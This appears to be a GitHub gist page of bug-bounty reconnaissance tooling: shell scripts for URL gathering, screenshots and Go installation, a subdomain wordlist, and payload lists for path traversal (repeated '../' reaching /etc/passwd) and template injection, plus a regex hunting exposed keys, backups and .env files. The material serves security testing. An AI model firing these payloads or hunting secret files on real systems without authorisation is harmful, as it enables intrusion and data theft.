Eshan Singh R0X4R

R0X4R / headers.txt
Last active November 3, 2021 00:02
Updated
X-Forwarded-For:
X-Originally-Forwarded-For:
X-Originating-Ip:
X-Originating:
True-Client-IP:
Referer:
X-WAP-Profile:
Host:
From:
X-Original-URL: http://
R0X4R / protpscan.sh
Created July 5, 2021 09:45
A Prototype pollution vulnerability scanner
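#!/bin/bash
# protpscan (opening stage): reads a targets file and gathers known URLs for
# each entry with waybackurls and gauplus. Later stages of the script are not
# shown in this listing.
# requirements: https://github.com/detectify/page-fetch, https://github.com/tomnomnom/waybackurls, https://github.com/bp0lr/gauplus, https://github.com/R0X4R/Fuzzy, https://github.com/jaeles-project/gospider, https://snapcraft.io/chromium
# usage: subfinder -d target.com -all -silent | httpx -silent | anew -q /home/targets.txt && ./protpscan.sh /home/targets.txt
#
# Arguments: $1 - path to a file holding one target per line
# Outputs:   protpscan/wayback.txt, protpscan/gauplus.txt

targets=${1:-}
# Without a readable file the line count below would block on stdin.
if [[ -z "$targets" || ! -r "$targets" ]]; then
  printf 'usage: %s <targets-file>\n' "${0##*/}" >&2
  exit 2
fi
# Resolve the path against the starting directory, because the script changes
# into protpscan/ below and a relative path would no longer point at the file.
[[ "$targets" == /* ]] || targets="$PWD/$targets"

mkdir -p protpscan
# Stop if the work directory is unusable; carrying on would drop the result
# files into whatever directory the script was started from.
cd protpscan || exit 1

echo -e "Total $(wc -l < "$targets") domains loaded to scan"
echo -e "Increasing scope..."
# Each line of the targets file reaches the child shell as the positional
# parameter $1 instead of being pasted into the command text, so shell
# metacharacters in that file are handled as data and never executed.
xargs -a "$targets" -P 50 -I % bash -c 'printf "%s\n" "$1" | waybackurls' _ % 2> /dev/null | anew -q wayback.txt
gauplus --random-agent -b eot,jpg,jpeg,gif,css,tif,tiff,png,ttf,otf,woff,woff2,ico,pdf,svg,txt -t 300 -o gauplus.txt < "$targets" &> /dev/null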
R0X4R / cudns.txt
Last active November 24, 2021 00:32
Custom common subdomains obtained from different sources
alpblog
www
%20%20%20%20s3
%20%20www
%20.
%20675-ybi-674
%20assets
%20b92
%20connect
%20databank
R0X4R / taskkiller.sh
Created July 12, 2021 08:19
Helps you kill unnecessary tasks running on Linux and Ubuntu.
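#!/bin/bash
# Task Killer
# Helps you to kill unnecessary tasks running on linux and ubuntu.
#
# Usage:     taskkiller.sh <pattern>
# Arguments: $1 - extended regular expression, matched against the full
#                 command line of every process (pgrep -f)
# Returns:   0 when all matched processes were signalled (or none matched),
#            1 when at least one kill failed, 2 on a usage error

pattern=${1:-}
# An empty pattern matches every process on the system, so it is refused
# instead of being turned into a kill of everything the caller may signal.
if [[ -z "$pattern" ]]; then
  printf 'usage: %s <pattern>\n' "${0##*/}" >&2
  exit 2
fi

echo -e "$1 - Killing task..."

# pgrep -f looks at command lines only, so a pattern can no longer hit the
# user, PID or TTY columns of `ps aux` by accident. This script's own command
# line contains the pattern, hence its PID and its parent's PID are skipped.
pids=()
while IFS= read -r pid; do
  [[ "$pid" == "$$" || "$pid" == "$PPID" ]] && continue
  pids+=("$pid")
done < <(pgrep -f -- "$pattern")

totaltask=${#pids[@]}
echo -e "Total $totaltask tasks found"
sleep 3s

# SIGTERM (the kill default) lets each process shut down cleanly.
status=0
for pid in "${pids[@]}"; do
  kill "$pid" 2> /dev/null || status=1
done
exit "$status"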
R0X4R / crawler.py
Last active September 8, 2022 05:35
Fetch all the links from the URLs given on stdin
# Import modules that'll be needed to run this tool
import requests
from bs4 import BeautifulSoup
from re import search
from sys import stdin, exit, stdout
from time import sleep
# Silence urllib3's InsecureRequestWarning, the warning raised when an HTTPS
# request is sent without certificate verification.
# NOTE(review): presumably the requests made later in this file pass
# verify=False (not visible in this listing) — confirm. Hiding the warning does
# not restore verification: responses fetched that way are unauthenticated and
# can be altered in transit.
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
R0X4R / chakshu.sh
Last active September 8, 2022 05:36
Takes website screenshots using the Chromium browser
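#!/bin/bash
# requirements: chromium or chrome browser (sudo apt update && sudo apt install snapd && sudo systemctl start snapd.service && sudo snap install chromium)
# usage: subfinder -d target.com -all -silent | httpx -silent | xargs -P 50 -I % ./chakshu.sh %
#   (the script is invoked directly rather than through `bash -c "... %"`, so a
#   discovered URL is passed as one argument and never parsed as shell code)
#
# Arguments: $1 - URL or host to capture
# Outputs:   screenshots/<sanitised target>.jpg
# Returns:   0 when Chromium exits successfully, 1 when it fails,
#            2 on a usage error

domain=${1:-}
# Refuse an empty target and anything beginning with '-': Chromium would read
# such a value as one of its own switches instead of as the page to load.
if [[ -z "$domain" || "$domain" == -* ]]; then
  printf 'usage: %s <url>\n' "${0##*/}" >&2
  exit 2
fi

echo -e "[CHAKSHU] - Taking screenshot of $1"

# Build the file name from the part after the last "//" and replace every run
# of characters outside [A-Za-z0-9_-] with "_". Besides '.' and ':' this also
# covers '/', so a URL with a path cannot name a file outside screenshots/ or
# point into a directory that does not exist.
output=${domain##*//}
output=$(printf '%s\n' "$output" | sed -E 's/[^A-Za-z0-9_-]+/_/g')

# all the screenshots will be saved in screenshots folder
mkdir -p screenshots || exit 1

# NOTE(review): --no-sandbox turns off Chromium's renderer sandbox while it
# loads pages the operator does not control. Run this as an unprivileged user
# inside a disposable VM or container, and drop the flag wherever Chromium
# starts without it.
if /snap/bin/chromium --no-sandbox --headless --disable-gpu --window-size=1280,720 --screenshot "$domain" --screenshot="screenshots/$output.jpg" > /dev/null 2>&1; then
  exit 0
fi
exit 1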
R0X4R / lfipayloads.txt
Created July 2, 2021 07:52
LFI Payloads for lfi scanning
/etc/passwd
../../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../../etc/passwd
../../../../../../../../../../../../../../etc/passwd
R0X4R / sstipayloads.txt
Created July 2, 2021 07:54
SSTI Payloads list for ssti scanning
check-ssti{{7*7}}[[1*1]]
check-ssti{{7*7}}
check-ssti{{7*'7'}}
check-ssti<%= 7 * 7 %>
check-ssti${7*7}
check-ssti${{7*7}}
check-ssti@(7*7)
check-ssti#{7*7}
check-ssti#{ 7 * 7 }
R0X4R / goinstaller.sh
Last active August 1, 2023 08:41
Go language installer for linux and debian systems.
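#!/usr/bin/env bash
# Go language installer (opening stage): looks up the latest release name,
# reports the currently installed version, removes the distribution package and
# downloads the release tarball. Later steps are not shown in this listing.
#
# TLS certificate verification is left enabled for both the version lookup and
# the download: the tarball is destined for a system-wide install, so it has to
# come from an authenticated server.

# -f fails on HTTP errors, -L follows redirects; only the first line is kept
# because the value is used below as part of a URL and a file name.
go_version=$(curl -fsSL 'https://golang.org/VERSION?m=text' | head -n 1)
red_color="\e[31m"
green_color="\e[32m"
no_color="\e[0m"

# Accept nothing but a release name such as go1.21.0 or go1.21rc2, so an error
# page or any other unexpected response never reaches the download URL.
if [[ ! "$go_version" =~ ^go[0-9][0-9A-Za-z.]*$ ]]; then
  echo -e "${red_color}Could not determine the latest go version${no_color}" >&2
  exit 1
fi

if type -P go &> /dev/null; then
  echo -e "Current go version is ${green_color}$(go version | awk '{print $3}')${no_color}"
else
  echo -e "${red_color}Go is not installed on your system${no_color}"
fi
echo -e "Downloading latest go into your system - version ${green_color}${go_version}${no_color}"
# NOTE(review): apt's output is discarded here, so a confirmation prompt from
# the purge would be invisible to the user — confirm this is intended.
sudo apt purge --auto-remove golang-go &> /dev/null
sudo apt clean &> /dev/null
# NOTE(review): no checksum or signature check of the tarball is visible in
# this listing; compare it with the published SHA-256 before unpacking.
if ! wget -q "https://dl.google.com/go/${go_version}.linux-amd64.tar.gz" 2> /dev/null; then
  echo -e "${red_color}Download of ${go_version} failed${no_color}" >&2
  exit 1
fi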
R0X4R / extensions.txt
Created May 20, 2021 15:04
Sensitive file extension
"([^.]+)\.zip$|([^.]+)\.zip\.[0-9]+$|([^.]+)\.zip[0-9]+$|([^.]+)\.zip[a-z][A-Z][0-9]+$|([^.]+)\.zip\.[a-z][A-Z][0-9]+$|([^.]+)\.rar$|([^.]+)\.tar$|([^.]+)\.tar\.gz$|([^.]+)\.tgz$|([^.]+)\.sql$|([^.]+)\.db$|([^.]+)\.sqlite$|([^.]+)\.pgsql\.txt$|([^.]+)\.mysql\.txt$|([^.]+)\.gz$|([^.]+)\.config$|([^.]+)\.log$|([^.]+)\.bak$|([^.]+)\.backup$|([^.]+)\.bkp$|([^.]+)\.crt$|([^.]+)\.dat$|([^.]+)\.eml$|([^.]+)\.java$|([^.]+)\.lst$|([^.]+)\.key$|([^.]+)\.passwd$|([^.]+)\.pl$|([^.]+)\.pwd$|([^.]+)\.mysql-connect$|([^.]+)\.jar$|([^.]+)\.cfg$|([^.]+)\.dir$|([^.]+)\.orig$|([^.]+)\.bz2$|([^.]+)\.old$|([^.]+)\.vbs$|([^.]+)\.img$|([^.]+)\.inf$|([^.]+)\.sh$|([^.]+)\.py$|([^.]+)\.vbproj$|([^.]+)\.mysql-pconnect$|([^.]+)\.war$|([^.]+)\.go$|([^.]+)\.psql$|([^.]+)\.sql\.gz$|([^.]+)\.vb$|([^.]+)\.webinfo$|([^.]+)\.jnlp$|([^.]+)\.cgi$|([^.]+)\.temp$|([^.]+)\.ini$|([^.]+)\.webproj$|([^.]+)\.xsql$|([^.]+)\.raw$|([^.]+)\.inc$|([^.]+)\.lck$|([^.]+)\.nz$|([^.]+)\.rc$|([^.]+)\.html\.gz$|([^.]+)\.gz$|([^.]+)\.env$|([^.]+)\.yml$"